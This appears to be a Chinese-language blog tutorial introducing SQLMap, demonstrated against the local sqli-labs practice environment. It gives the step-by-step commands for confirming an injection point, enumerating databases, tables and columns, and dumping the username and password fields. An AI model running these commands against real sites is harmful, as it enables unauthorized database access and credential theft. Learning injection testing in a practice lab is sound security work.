Web安全学习之SQLMap入门学习

SQLMap注入神器,先就简单的介绍一下最最最最基础的用法.

使用SQLMap
使用sqli-labs的数据库和页面作为示例。

已知存在注入点http://localhost/sqlilabs/Less-1/,使用SQLMap对其提取管理员数据,具体步骤如下:

第一步:判断是否是注入点

sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1"

使用-u参数指定URL,如果URL存在注入点,将会显示出Web容器,数据库版本信息,如下所示:
请输入图片描述

第二步:获取数据库

sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" --dbs

使用--dbs参数读取数据库,如下:
请输入图片描述

第三步:查看当前应用程序所用数据库

sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" --current-db

请输入图片描述

第四步:列出指定数据库的所有表

sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" --tables -D "security"

使用--table参数获取数据库表,-D参数指定数据库,如下:
64780-kuspqv4ntwn.png

第五步:读取指定表中的字段名称

sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" --columns -T "users" -D "security"

使用--columns参数列取字段名,如下:
93646-dosrddcuwos.png

第六步:读取指定字段内容

sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" --dump -C "username, password" -T "users" -D "security"

--dump意味转存数据,-C指定字段名称,-T指定表名,-D指定数据库名称。
44991-c3t9mr26cs7.png
在读取数据后,SQLMap会把读取的数据转存到SQLMap/output/目录下。
<?php getCatalog(); ?>

最后修改:2020 年 09 月 24 日 07 : 20 PM
如果觉得我的文章对你有用,请随意赞赏